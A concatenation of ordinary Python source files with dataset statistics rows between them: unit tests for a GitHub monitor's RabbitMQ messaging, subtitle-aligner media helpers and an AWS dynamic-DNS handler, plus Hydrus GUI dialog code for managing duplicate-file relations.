# messages in the queue.
res = self.test_monitor.rabbitmq.queue_declare(
queue=self.test_queue_name, durable=True, exclusive=False,
auto_delete=False, passive=True
)
# There must be 1 message in the queue, the processed data
self.assertEqual(1, res.method.message_count)
# Check that the message received is actually the processed data
_, _, body = self.test_monitor.rabbitmq.basic_get(
self.test_queue_name)
self.assertEqual(expected_output_data, json.loads(body))
except Exception as e:
self.fail("Test failed: {}".format(e))
@mock.patch.object(GitHubMonitor, "_send_data")
@mock.patch.object(GitHubMonitor, "_get_data")
def test_monitor_send_data_raises_amqp_channel_error_on_channel_error(
self, mock_get_data, mock_send_data) -> None:
mock_get_data.return_value = self.retrieved_metrics_example
mock_send_data.side_effect = pika.exceptions.AMQPChannelError('test')
try:
self.test_monitor._initialise_rabbitmq()
self.assertRaises(pika.exceptions.AMQPChannelError,
self.test_monitor._monitor)
except Exception as e:
self.fail("Test failed: {}".format(e))
@freeze_time("2012-01-01")
@mock.patch.object(GitHubMonitor, "_send_heartbeat")
@mock.patch.object(GitHubMonitor, "_get_data")
def test_monitor_send_hb_raises_amqp_chan_err_on_chan_err_and_sends_data(
self, mock_get_data, mock_send_heartbeat) -> None:
mock_get_data.return_value = self.retrieved_metrics_example
mock_send_heartbeat.side_effect = \
pika.exceptions.AMQPChannelError('test')
expected_output_data = {
'result': {
'meta_data': {
'monitor_name': self.test_monitor.monitor_name,
'repo_name': self.test_monitor.repo_config.repo_name,
'repo_id': self.test_monitor.repo_config.repo_id,
'repo_parent_id': self.test_monitor.repo_config.parent_id,
'time': datetime(2012, 1, 1).timestamp()
},
'data': self.processed_data_example,
}
}
try:
self.test_monitor._initialise_rabbitmq()
self.test_monitor.rabbitmq.queue_delete(self.test_queue_name)
res = self.test_monitor.rabbitmq.queue_declare(
queue=self.test_queue_name, durable=True, exclusive=False,
auto_delete=False, passive=False
)
self.assertEqual(0, res.method.message_count)
self.test_monitor.rabbitmq.queue_bind(
queue=self.test_queue_name, exchange=RAW_DATA_EXCHANGE,
routing_key=GITHUB_RAW_DATA_ROUTING_KEY)
self.test_monitor.rabbitmq.queue_bind(
queue=self.test_queue_name, exchange=HEALTH_CHECK_EXCHANGE,
routing_key=HEARTBEAT_OUTPUT_WORKER_ROUTING_KEY)
self.assertRaises(pika.exceptions.AMQPChannelError,
self.test_monitor._monitor)
# By re-declaring the queue again we can get the number of
# messages in the queue.
res = self.test_monitor.rabbitmq.queue_declare(
queue=self.test_queue_name, durable=True, exclusive=False,
auto_delete=False, passive=True
)
# There must be 1 message in the queue, the processed data
self.assertEqual(1, res.method.message_count)
# Check that the message received is actually the processed data
_, _, body = self.test_monitor.rabbitmq.basic_get(
self.test_queue_name)
self.assertEqual(expected_output_data, json.loads(body))
except Exception as e:
self.fail("Test failed: {}".format(e))
@mock.patch.object(GitHubMonitor, "_send_data")
@mock.patch.object(GitHubMonitor, "_get_data")
def test_monitor_send_data_raises_amqp_conn_error_on_conn_error(
self, mock_get_data, mock_send_data) -> None:
mock_get_data.return_value = self.retrieved_metrics_example
mock_send_data.side_effect = pika.exceptions.AMQPConnectionError('test')
try:
self.test_monitor._initialise_rabbitmq()
self.assertRaises(pika.exceptions.AMQPConnectionError,
self.test_monitor._monitor)
except Exception as e:
self.fail("Test failed: {}".format(e))
@freeze_time("2012-01-01")
@mock.patch.object(GitHubMonitor, "_send_heartbeat")
@mock.patch.object(GitHubMonitor, "_get_data")
def test_monitor_send_hb_raises_amqp_conn_err_on_conn_err_and_sends_data(
self, mock_get_data, mock_send_heartbeat) -> None:
mock_get_data.return_value = self.retrieved_metrics_example
mock_send_heartbeat.side_effect = \
pika.exceptions.AMQPConnectionError('test')
expected_output_data = {
'result': {
'meta_data': {
'monitor_name': self.test_monitor.monitor_name,
'repo_name': self.test_monitor.repo_config.repo_name,
'repo_id': self.test_monitor.repo_config.repo_id,
'repo_parent_id': self.test_monitor.repo_config.parent_id,
'time': datetime(2012, 1, 1).timestamp()
},
'data': self.processed_data_example,
}
}
try:
self.test_monitor._initialise_rabbitmq()
self.test_monitor.rabbitmq.queue_delete(self.test_queue_name)
res = self.test_monitor.rabbitmq.queue_declare(
queue=self.test_queue_name, durable=True, exclusive=False,
auto_delete=False, passive=False
)
self.assertEqual(0, res.method.message_count)
self.test_monitor.rabbitmq.queue_bind(
queue=self.test_queue_name, exchange=RAW_DATA_EXCHANGE,
routing_key=GITHUB_RAW_DATA_ROUTING_KEY)
self.test_monitor.rabbitmq.queue_bind(
queue=self.test_queue_name, exchange=HEALTH_CHECK_EXCHANGE,
routing_key=HEARTBEAT_OUTPUT_WORKER_ROUTING_KEY)
self.assertRaises(pika.exceptions.AMQPConnectionError,
self.test_monitor._monitor)
# By re-declaring the queue again we can get the number of
# messages in the queue.
res = self.test_monitor.rabbitmq.queue_declare(
queue=self.test_queue_name, durable=True, exclusive=False,
auto_delete=False, passive=True
)
# There must be 1 message in the queue, the processed data
self.assertEqual(1, res.method.message_count)
# Check that the message received is actually the processed data
_, _, body = self.test_monitor.rabbitmq.basic_get(
self.test_queue_name)
self.assertEqual(expected_output_data, json.loads(body))
except Exception as e:
self.fail("Test failed: {}".format(e))
@mock.patch.object(GitHubMonitor, "_send_data")
@mock.patch.object(GitHubMonitor, "_get_data")
def test_monitor_does_not_send_hb_and_data_if_send_data_fails(
self, mock_get_data, mock_send_data) -> None:
mock_get_data.return_value = self.retrieved_metrics_example
exception_types_dict = \
{
Exception('test'): Exception,
pika.exceptions.AMQPConnectionError('test'):
pika.exceptions.AMQPConnectionError,
pika.exceptions.AMQPChannelError('test'):
pika.exceptions.AMQPChannelError,
MessageWasNotDeliveredException('test'):
MessageWasNotDeliveredException
}
try:
self.test_monitor._initialise_rabbitmq()
for exception, exception_type in exception_types_dict.items():
mock_send_data.side_effect = exception
self.test_monitor.rabbitmq.queue_delete(
self.test_queue_name)
res = self.test_monitor.rabbitmq.queue_declare(
queue=self.test_queue_name, durable=True, exclusive=False,
auto_delete=False, passive=False
)
self.assertEqual(0, res.method.message_count)
self.test_monitor.rabbitmq.queue_bind(
queue=self.test_queue_name,
exchange=HEALTH_CHECK_EXCHANGE,
routing_key=HEARTBEAT_OUTPUT_WORKER_ROUTING_KEY)
self.test_monitor.rabbitmq.queue_bind(
queue=self.test_queue_name, exchange=RAW_DATA_EXCHANGE,
routing_key=GITHUB_RAW_DATA_ROUTING_KEY)
self.assertRaises(exception_type, self.test_monitor._monitor)
# By re-declaring the queue again we can get the number of
# messages in the queue.
res = self.test_monitor.rabbitmq.queue_declare(
queue=self.test_queue_name, durable=True,
exclusive=False, auto_delete=False, passive=True
)
# There must be no messages in the queue.
self.assertEqual(0, res.method.message_count)
except Exception as e:
self.fail("Test failed: {}".format(e))
| 46.912114
| 80
| 0.62157
| 4,467
| 39,500
| 5.181554
| 0.068278
| 0.08226
| 0.098505
| 0.076514
| 0.820271
| 0.791713
| 0.771494
| 0.736672
| 0.728636
| 0.715934
| 0
| 0.007197
| 0.299975
| 39,500
| 841
| 81
| 46.967895
| 0.829807
| 0.093722
| 0
| 0.627246
| 0
| 0
| 0.049104
| 0.001288
| 0
| 0
| 0
| 0
| 0.085329
| 1
| 0.038922
| false
| 0.034431
| 0.026946
| 0
| 0.067365
| 0.001497
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
a3c37298c5c61b9a81ea83aa65f232528536f622
| 10,790
|
py
|
Python
|
tests/subaligner/test_media_helper.py
|
JohnVillalovos/subaligner
|
41bd00b4661b4ba35bdd2915e89fc368dcc7663a
|
[
"MIT"
] | null | null | null |
tests/subaligner/test_media_helper.py
|
JohnVillalovos/subaligner
|
41bd00b4661b4ba35bdd2915e89fc368dcc7663a
|
[
"MIT"
] | null | null | null |
tests/subaligner/test_media_helper.py
|
JohnVillalovos/subaligner
|
41bd00b4661b4ba35bdd2915e89fc368dcc7663a
|
[
"MIT"
] | null | null | null |
import unittest
import os
import pysrt
import subprocess
from subaligner.exception import TerminalException, NoFrameRateException
from subaligner.media_helper import MediaHelper as Undertest
from mock import patch, Mock
class MediaHelperTests(unittest.TestCase):
def setUp(self):
self.__video_file_path = os.path.join(
os.path.dirname(os.path.abspath(__file__)), "resource/test.mp4"
)
self.__subtitle_file_path = os.path.join(
os.path.dirname(os.path.abspath(__file__)), "resource/test.srt"
)
self.__test_audio_path = os.path.join(
os.path.dirname(os.path.abspath(__file__)), "resource/test.wav"
)
self.__audio_file_path = None
self.__segment_paths = []
def tearDown(self):
if self.__audio_file_path is not None:
os.remove(self.__audio_file_path) if os.path.isfile(
self.__audio_file_path
) else None
if self.__segment_paths is not None:
for segment_path in self.__segment_paths:
os.remove(segment_path) if os.path.isfile(segment_path) else None
def test_extract_audio_wav(self):
self.__audio_file_path = Undertest.extract_audio(
self.__video_file_path, True, 16000
)
self.assertTrue(os.path.isfile(self.__audio_file_path))
def test_extract_audio_aac(self):
self.__audio_file_path = Undertest.extract_audio(self.__video_file_path)
self.assertTrue(os.path.isfile(self.__audio_file_path))
def test_extract_audio_wav_from_start(self):
self.__audio_file_path = Undertest.extract_audio(
self.__video_file_path, True, 16000
)
segment_path, duration = Undertest.extract_audio_from_start_to_end(
self.__audio_file_path, "00:00:13,750"
)
self.assertTrue(os.path.isfile(segment_path))
self.__segment_paths.append(segment_path)
self.assertIsNone(duration)
def test_get_duration_in_seconds(self):
duration = Undertest.get_duration_in_seconds(
start="02:10:12,222", end="03:12:24,328"
)
self.assertEqual(3732.106, duration)
def test_get_duration_in_seconds_without_start(self):
duration = Undertest.get_duration_in_seconds(start=None, end="01:01:01,100")
self.assertEqual(3661.100, duration)
def test_extract_audio_wav_from_start_to_end(self):
self.__audio_file_path = Undertest.extract_audio(
self.__video_file_path, True, 16000
)
segment_path, duration = Undertest.extract_audio_from_start_to_end(
self.__audio_file_path, "00:00:13,750", "00:00:16,150"
)
self.assertTrue(os.path.isfile(segment_path))
self.__segment_paths.append(segment_path)
self.assertEqual(2.4, duration)
def test_get_audio_segment_starts_and_ends(self):
subs = pysrt.open(self.__subtitle_file_path, encoding="utf-8")
segment_starts, segment_ends, new_subs = Undertest.get_audio_segment_starts_and_ends(
subs
)
self.assertEqual(len(segment_starts), len(segment_ends))
self.assertEqual(len(segment_starts), len(new_subs))
for sub in new_subs:
self.assertIsInstance(sub, pysrt.SubRipFile)
def test_get_frame_rate(self):
self.assertEqual(24.0, Undertest.get_frame_rate(self.__video_file_path))
def test_throw_terminal_exception_on_bad_video(self):
try:
Undertest.extract_audio("bad_video_file_path", True, 16000)
except Exception as e:
self.assertTrue(isinstance(e, TerminalException))
self.assertFalse(os.path.exists("bad_video_file_path.mp4.wav"))
else:
self.fail("Should have thrown exception")
@patch("subprocess.Popen")
def test_throw_exception_on_extract_audio_with_error_code(self, mock_popen):
mock_popen.returncode.return_value = 1
mock_popen.communicate = Mock()
mock_popen.communicate.return_value = 1
try:
Undertest.extract_audio(self.__video_file_path)
except Exception as e:
self.assertTrue(mock_popen.communicate.called_with(180))
self.assertTrue(isinstance(e, TerminalException))
self.assertTrue("Cannot extract audio from video:" in str(e))
else:
self.fail("Should have thrown exception")
@patch("subprocess.Popen.communicate", side_effect=subprocess.TimeoutExpired("", 1.0))
def test_throw_exception_on_extract_audio_timeout(self, mock_communicate):
try:
Undertest.extract_audio(self.__video_file_path)
except Exception as e:
self.assertTrue(mock_communicate.called)
self.assertTrue(isinstance(e, TerminalException))
self.assertTrue("Timeout on extracting audio from video:" in str(e))
else:
self.fail("Should have thrown exception")
@patch("subprocess.Popen.communicate", side_effect=KeyboardInterrupt)
def test_throw_exception_on_extract_audio_interrupted(self, mock_communicate):
try:
Undertest.extract_audio(self.__video_file_path)
except Exception as e:
self.assertTrue(mock_communicate.called)
self.assertTrue(isinstance(e, TerminalException))
self.assertTrue("interrupted" in str(e))
else:
self.fail("Should have thrown exception")
@patch("subprocess.Popen.communicate", side_effect=Exception())
def test_throw_exception_on_vtt2srt_exception(self, mock_communicate):
try:
Undertest.extract_audio(self.__video_file_path)
except Exception as e:
self.assertTrue(mock_communicate.called)
self.assertTrue(isinstance(e, TerminalException))
self.assertTrue("Cannot extract audio from video:" in str(e))
else:
self.fail("Should have thrown exception")
@patch("subprocess.Popen.communicate", return_value=1)
def test_throw_exception_on_extract_partial_audio_with_error_code(self, mock_communicate):
try:
Undertest.extract_audio_from_start_to_end(
self.__test_audio_path, "00:00:13,750", "00:00:16,150"
)
except Exception as e:
self.assertTrue(mock_communicate.called)
self.assertTrue(isinstance(e, TerminalException))
self.assertTrue("Cannot clip audio:" in str(e))
else:
self.fail("Should have thrown exception")
@patch("subprocess.Popen.communicate", side_effect=subprocess.TimeoutExpired("", 1.0))
def test_throw_exception_on_extract_partial_audio_timeout(self, mock_communicate):
try:
Undertest.extract_audio_from_start_to_end(
self.__test_audio_path, "00:00:13,750", "00:00:16,150"
)
except Exception as e:
self.assertTrue(mock_communicate.called)
self.assertTrue(isinstance(e, TerminalException))
self.assertTrue("Timeout on extracting audio from audio:" in str(e))
else:
self.fail("Should have thrown exception")
@patch("subprocess.Popen.communicate", side_effect=Exception())
def test_throw_exception_on_extract_partial_audio_exception(self, mock_communicate):
try:
Undertest.extract_audio_from_start_to_end(
self.__test_audio_path, "00:00:13,750", "00:00:16,150"
)
except Exception as e:
self.assertTrue(mock_communicate.called)
self.assertTrue(isinstance(e, TerminalException))
self.assertTrue("Cannot clip audio:" in str(e))
else:
self.fail("Should have thrown exception")
@patch("subprocess.Popen.communicate", side_effect=KeyboardInterrupt)
def test_throw_exception_on_extract_partial_audio_interrupted(self, mock_communicate):
try:
Undertest.extract_audio_from_start_to_end(
self.__test_audio_path, "00:00:13,750", "00:00:16,150"
)
except Exception as e:
self.assertTrue(mock_communicate.called)
self.assertTrue(isinstance(e, TerminalException))
self.assertTrue("interrupted" in str(e))
else:
self.fail("Should have thrown exception")
def test_throw_no_frame_rate_exception_on_audio(self):
try:
Undertest.get_frame_rate(self.__test_audio_path)
except Exception as e:
self.assertTrue(isinstance(e, NoFrameRateException))
else:
self.fail("Should have thrown exception")
@patch("subprocess.Popen.communicate", return_value=1)
def test_throw_exception_on_get_frame_rate(self, mock_communicate):
try:
Undertest.get_frame_rate(self.__video_file_path)
except Exception as e:
self.assertTrue(mock_communicate.called)
self.assertTrue(isinstance(e, NoFrameRateException))
self.assertTrue("Cannot extract the frame rate from video:" in str(e))
else:
self.fail("Should have thrown exception")
@patch("subprocess.Popen.communicate", side_effect=subprocess.TimeoutExpired("", 1.0))
def test_throw_exception_on_get_frame_rate_timeout(self, mock_communicate):
try:
Undertest.get_frame_rate(self.__video_file_path)
except Exception as e:
self.assertTrue(mock_communicate.called)
self.assertTrue(isinstance(e, NoFrameRateException))
self.assertTrue("Timeout on extracting the frame rate from video:" in str(e))
else:
self.fail("Should have thrown exception")
@patch("subprocess.Popen.communicate", side_effect=Exception())
def test_throw_exception_on_get_frame_rate_exception(self, mock_communicate):
try:
Undertest.get_frame_rate(self.__video_file_path)
except Exception as e:
self.assertTrue(mock_communicate.called)
self.assertTrue(isinstance(e, NoFrameRateException))
self.assertTrue("Cannot extract the frame rate from video:" in str(e))
else:
self.fail("Should have thrown exception")
@patch("subprocess.Popen.communicate", side_effect=KeyboardInterrupt)
def test_throw_exception_on_get_frame_rate_interrupted(self, mock_communicate):
try:
Undertest.get_frame_rate(self.__video_file_path)
except Exception as e:
self.assertTrue(mock_communicate.called)
self.assertTrue(isinstance(e, TerminalException))
self.assertTrue("interrupted" in str(e))
else:
self.fail("Should have thrown exception")
if __name__ == "__main__":
unittest.main()
| 42.648221
| 94
| 0.674791
| 1,299
| 10,790
| 5.274057
| 0.107005
| 0.085827
| 0.030361
| 0.034739
| 0.837688
| 0.815647
| 0.781492
| 0.755072
| 0.70632
| 0.696833
| 0
| 0.022039
| 0.234662
| 10,790
| 252
| 95
| 42.81746
| 0.807581
| 0
| 0
| 0.587444
| 0
| 0
| 0.123726
| 0.031047
| 0
| 0
| 0
| 0
| 0.2287
| 1
| 0.107623
| false
| 0
| 0.03139
| 0
| 0.143498
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
a3fd16ede73dbbb8a29dda27dfd73323324fc854
| 45
|
py
|
Python
|
representation_learning_for_transcriptomics/supervised/predictors/regressors/__init__.py
|
unlearnai/representation_learning_for_transcriptomics
|
66e7a31471ca3ded5d46945d34c74bad8f22afbf
|
[
"CC-BY-4.0"
] | 3
|
2020-03-30T00:36:11.000Z
|
2021-05-07T18:43:27.000Z
|
representation_learning_for_transcriptomics/supervised/predictors/regressors/__init__.py
|
unlearnai/representation_learning_for_transcriptomics
|
66e7a31471ca3ded5d46945d34c74bad8f22afbf
|
[
"CC-BY-4.0"
] | null | null | null |
representation_learning_for_transcriptomics/supervised/predictors/regressors/__init__.py
|
unlearnai/representation_learning_for_transcriptomics
|
66e7a31471ca3ded5d46945d34c74bad8f22afbf
|
[
"CC-BY-4.0"
] | null | null | null |
from .proportional_hazard_regressor import *
| 22.5
| 44
| 0.866667
| 5
| 45
| 7.4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088889
| 45
| 1
| 45
| 45
| 0.902439
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
430663ee688fa24dff6590627c73da259bf3e17e
| 9,170
|
py
|
Python
|
include/ClientGUIDuplicates.py
|
sorashi/hydrus
|
0544a75d2117904b42e935d264ae35ded5cbf36a
|
[
"WTFPL"
] | null | null | null |
include/ClientGUIDuplicates.py
|
sorashi/hydrus
|
0544a75d2117904b42e935d264ae35ded5cbf36a
|
[
"WTFPL"
] | null | null | null |
include/ClientGUIDuplicates.py
|
sorashi/hydrus
|
0544a75d2117904b42e935d264ae35ded5cbf36a
|
[
"WTFPL"
] | null | null | null |
from . import ClientGUIDialogsQuick
from . import HydrusExceptions
import os
import traceback
from . import HydrusData
from . import HydrusGlobals as HG
from qtpy import QtWidgets as QW
def ClearFalsePositives( win, hashes ):
if len( hashes ) == 1:
message = 'Are you sure you want to clear this file of its false-positive relations?'
message += os.linesep * 2
message += 'False-positive relations are recorded between alternate groups, so this change will also affect any files this file is alternate to.'
message += os.linesep * 2
message += 'All affected files will be queued up for another potential duplicates search, so you will likely see at least one of them again in the duplicate filter.'
else:
message = 'Are you sure you want to clear these {} files of their false-positive relations?'.format( HydrusData.ToHumanInt( len( hashes ) ) )
message += os.linesep * 2
message += 'False-positive relations are recorded between alternate groups, so this change will also affect all alternate files to your selection.'
message += os.linesep * 2
message += 'All affected files will be queued up for another potential duplicates search, so you will likely see some of them again in the duplicate filter.'
result = ClientGUIDialogsQuick.GetYesNo( win, message )
if result == QW.QDialog.Accepted:
HG.client_controller.Write( 'clear_false_positive_relations', hashes )
def DissolveAlternateGroup( win, hashes ):
if len( hashes ) == 1:
message = 'Are you sure you want to dissolve this file\'s entire alternates group?'
message += os.linesep * 2
message += 'This will completely remove all duplicate, alternate, and false-positive relations for all files in the group and set them to come up again in the duplicate filter.'
message += os.linesep * 2
message += 'This is a potentially big change that throws away many previous decisions and cannot be undone. If you can achieve your result just by removing some alternate members, do that instead.'
else:
message = 'Are you sure you want to dissolve these {} files\' entire alternates groups?'.format( HydrusData.ToHumanInt( len( hashes ) ) )
message += os.linesep * 2
message += 'This will completely remove all duplicate, alternate, and false-positive relations for all alternate groups of all files selected and set them to come up again in the duplicate filter.'
message += os.linesep * 2
message += 'This is a potentially huge change that throws away many previous decisions and cannot be undone. If you can achieve your result just by removing some alternate members, do that instead.'
result = ClientGUIDialogsQuick.GetYesNo( win, message )
if result == QW.QDialog.Accepted:
HG.client_controller.Write( 'dissolve_alternates_group', hashes )
def DissolveDuplicateGroup( win, hashes ):
if len( hashes ) == 1:
message = 'Are you sure you want to dissolve this file\'s duplicate group?'
message += os.linesep * 2
message += 'This will split the duplicates group back into individual files and remove any alternate relations they have. They will be queued back up in the duplicate filter for reprocessing.'
message += os.linesep * 2
message += 'This could be a big change that throws away many previous decisions and cannot be undone. If you can achieve your result just by removing one or two members, do that instead.'
else:
message = 'Are you sure you want to dissolve these {} files\' duplicate groups?'.format( HydrusData.ToHumanInt( len( hashes ) ) )
message += os.linesep * 2
message += 'This will split all the files\' duplicates groups back into individual files and remove any alternate relations they have. They will all be queued back up in the duplicate filter for reprocessing.'
message += os.linesep * 2
message += 'This could be a huge change that throws away many previous decisions and cannot be undone. If you can achieve your result just by removing some members, do that instead.'
result = ClientGUIDialogsQuick.GetYesNo( win, message )
if result == QW.QDialog.Accepted:
HG.client_controller.Write( 'dissolve_duplicates_group', hashes )
def RemoveFromAlternateGroup( win, hashes ):
if len( hashes ) == 1:
message = 'Are you sure you want to remove this file from its alternates group?'
message += os.linesep * 2
message += 'Alternate relationships are stored between duplicate groups, so this will pull any duplicates of your file with it.'
message += os.linesep * 2
message += 'The removed file (and any duplicates) will be queued up for another potential duplicates search, so you will likely see at least one again in the duplicate filter.'
else:
message = 'Are you sure you want to remove these {} files from their alternates groups?'.format( HydrusData.ToHumanInt( len( hashes ) ) )
message += os.linesep * 2
message += 'Alternate relationships are stored between duplicate groups, so this will pull any duplicates of these files with them.'
message += os.linesep * 2
message += 'The removed files (and any duplicates) will be queued up for another potential duplicates search, so you will likely see some again in the duplicate filter.'
result = ClientGUIDialogsQuick.GetYesNo( win, message )
if result == QW.QDialog.Accepted:
HG.client_controller.Write( 'remove_alternates_member', hashes )
def RemoveFromDuplicateGroup( win, hashes ):
if len( hashes ) == 1:
message = 'Are you sure you want to remove this file from its duplicate group?'
message += os.linesep * 2
message += 'The remaining group will be otherwise unaffected and will keep its alternate relationships.'
message += os.linesep * 2
message += 'The removed file will be queued up for another potential duplicates search, so you will likely see it again in the duplicate filter.'
else:
message = 'Are you sure you want to remove these {} files from their duplicate groups?'.format( HydrusData.ToHumanInt( len( hashes ) ) )
message += os.linesep * 2
message += 'The remaining groups will be otherwise unaffected and keep their alternate relationships.'
message += os.linesep * 2
message += 'The removed files will be queued up for another potential duplicates search, so you will likely see them again in the duplicate filter.'
result = ClientGUIDialogsQuick.GetYesNo( win, message )
if result == QW.QDialog.Accepted:
HG.client_controller.Write( 'remove_duplicates_member', hashes )
def RemovePotentials( win, hashes ):
if len( hashes ) == 1:
message = 'Are you sure you want to remove all of this file\'s potentials?'
message += os.linesep * 2
message += 'This will mean it (or any of its duplicates) will not appear in the duplicate filter unless new potentials are found with new files. Use this command if the file has accidentally received many false positive potential relationships.'
else:
message = 'Are you sure you want to remove all of these {} files\' potentials?'.format( HydrusData.ToHumanInt( len( hashes ) ) )
message += os.linesep * 2
message += 'This will mean they (or any of their duplicates) will not appear in the duplicate filter unless new potentials are found with new files. Use this command if the files have accidentally received many false positive potential relationships.'
result = ClientGUIDialogsQuick.GetYesNo( win, message )
if result == QW.QDialog.Accepted:
HG.client_controller.Write( 'remove_potential_pairs', hashes )
def ResetPotentialSearch( win, hashes ):
if len( hashes ) == 1:
message = 'Are you sure you want to search this file for potential duplicates again?'
message += os.linesep * 2
message += 'This will not remove any existing potential pairs, and will typically not find any new relationships unless an error has occured.'
else:
message = 'Are you sure you want to search these {} files for potential duplicates again?'.format( HydrusData.ToHumanInt( len( hashes ) ) )
message += os.linesep * 2
message += 'This will not remove any existing potential pairs, and will typically not find any new relationships unless an error has occured.'
result = ClientGUIDialogsQuick.GetYesNo( win, message )
if result == QW.QDialog.Accepted:
HG.client_controller.Write( 'reset_potential_search_status', hashes )
| 50.10929
| 259
| 0.67132
| 1,178
| 9,170
| 5.206282
| 0.13837
| 0.035219
| 0.062612
| 0.066525
| 0.842818
| 0.833687
| 0.833687
| 0.797489
| 0.760802
| 0.741888
| 0
| 0.004595
| 0.264231
| 9,170
| 182
| 260
| 50.384615
| 0.904402
| 0
| 0
| 0.486486
| 0
| 0.063063
| 0.50349
| 0.01952
| 0
| 0
| 0
| 0
| 0
| 1
| 0.063063
| false
| 0
| 0.063063
| 0
| 0.126126
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
4332b416dfd4818b3a4462eaf2af070fba0f5a87
| 12,133
|
py
|
Python
|
tests/aws/test_functions_dns.py
|
amarkwalder/dynamicdns
|
68dbf80ca90c55a4e9273e6200f04eae90d785da
|
[
"MIT"
] | null | null | null |
tests/aws/test_functions_dns.py
|
amarkwalder/dynamicdns
|
68dbf80ca90c55a4e9273e6200f04eae90d785da
|
[
"MIT"
] | 2
|
2019-10-21T17:00:56.000Z
|
2021-05-07T11:51:55.000Z
|
tests/aws/test_functions_dns.py
|
amarkwalder/dynamicdns
|
68dbf80ca90c55a4e9273e6200f04eae90d785da
|
[
"MIT"
] | null | null | null |
import json
import unittest
from unittest.mock import MagicMock, Mock, patch, mock_open
import dynamicdns
from dynamicdns.aws.functions.dns import handle
from dynamicdns.models import Error
from dynamicdns.aws.route53 import Route53Provider
from dynamicdns.aws.s3config import S3ConfigProvider
from dynamicdns.aws.boto3wrapper import Boto3Wrapper
from dynamicdns.processor import Processor
class TestDNS(unittest.TestCase):
@patch('dynamicdns.processor.factory')
@patch('dynamicdns.aws.s3config.factory')
def testDNSSuccess(self, mock_config, mock_processor):
self.__setUpMocks(configFailed=False, hashFailed=False, updateFailed=False, mock_config=mock_config, mock_processor=mock_processor)
event = {
'queryStringParameters': { 'hostname': 'abc', 'hash': 'xyz', 'internalip': '2.2.2.2'},
'requestContext': { 'identity': { 'sourceIp': '1.1.1.1' } }
}
context = {}
result = handle(event, context)
self.__checkJson(result, "SUCCESS", "OK")
event = {
'queryStringParameters': { 'raw': '', 'hostname': 'abc', 'hash': 'xyz', 'internalip': '2.2.2.2'},
'requestContext': { 'identity': { 'sourceIp': '1.1.1.1' } }
}
context = {}
result = handle(event, context)
self.__checkRaw(result, "SUCCESS", "OK")
@patch('dynamicdns.processor.factory')
@patch('dynamicdns.aws.s3config.factory')
def testDNSFailConfig(self, mock_config, mock_processor):
self.__setUpMocks(configFailed=True, hashFailed=False, updateFailed=False, mock_config=mock_config, mock_processor=mock_processor)
event = {
'queryStringParameters': { 'hostname': 'abc', 'hash': 'xyz', 'internalip': '2.2.2.2'},
'requestContext': { 'identity': { 'sourceIp': '1.1.1.1' } }
}
context = {}
result = handle(event, context)
self.__checkJson(result, "FAIL", "Config Load failed")
event = {
'queryStringParameters': { 'raw': '', 'hostname': 'abc', 'hash': 'xyz', 'internalip': '2.2.2.2'},
'requestContext': { 'identity': { 'sourceIp': '1.1.1.1' } }
}
context = {}
result = handle(event, context)
self.__checkRaw(result, "FAIL", "Config Load failed")
@patch('dynamicdns.processor.factory')
@patch('dynamicdns.aws.s3config.factory')
def testDNSFailHashcheck(self, mock_config, mock_processor):
self.__setUpMocks(configFailed=False, hashFailed=True, updateFailed=False, mock_config=mock_config, mock_processor=mock_processor)
event = {
'queryStringParameters': { 'hostname': 'abc', 'hash': 'xyz', 'internalip': '2.2.2.2'},
'requestContext': { 'identity': { 'sourceIp': '1.1.1.1' } }
}
context = {}
result = handle(event, context)
self.__checkJson(result, "FAIL", "Hashcheck failed")
event = {
'queryStringParameters': { 'raw': '', 'hostname': 'abc', 'hash': 'xyz', 'internalip': '2.2.2.2'},
'requestContext': { 'identity': { 'sourceIp': '1.1.1.1' } }
}
context = {}
result = handle(event, context)
self.__checkRaw(result, "FAIL", "Hashcheck failed")
@patch('dynamicdns.processor.factory')
@patch('dynamicdns.aws.s3config.factory')
def testDNSFailUpdate(self, mock_config, mock_processor):
self.__setUpMocks(configFailed=False, hashFailed=False, updateFailed=True, mock_config=mock_config, mock_processor=mock_processor)
event = {
'queryStringParameters': { 'hostname': 'abc', 'hash': 'xyz', 'internalip': '2.2.2.2'},
'requestContext': { 'identity': { 'sourceIp': '1.1.1.1' } }
}
context = {}
result = handle(event, context)
self.__checkJson(result, "FAIL", "Update failed")
event = {
'queryStringParameters': { 'raw': '', 'hostname': 'abc', 'hash': 'xyz', 'internalip': '2.2.2.2'},
'requestContext': { 'identity': { 'sourceIp': '1.1.1.1' } }
}
context = {}
result = handle(event, context)
self.__checkRaw(result, "FAIL", "Update failed")
@patch('dynamicdns.processor.factory')
@patch('dynamicdns.aws.s3config.factory')
def testDNSMissingParamInternalIp(self, mock_config, mock_processor):
self.__setUpMocks(configFailed=False, hashFailed=False, updateFailed=False, mock_config=mock_config, mock_processor=mock_processor)
event = {
'queryStringParameters': { 'hostname': 'abc', 'hash': 'xyz'},
'requestContext': { 'identity': { 'sourceIp': '1.1.1.1' } }
}
context = {}
result = handle(event, context)
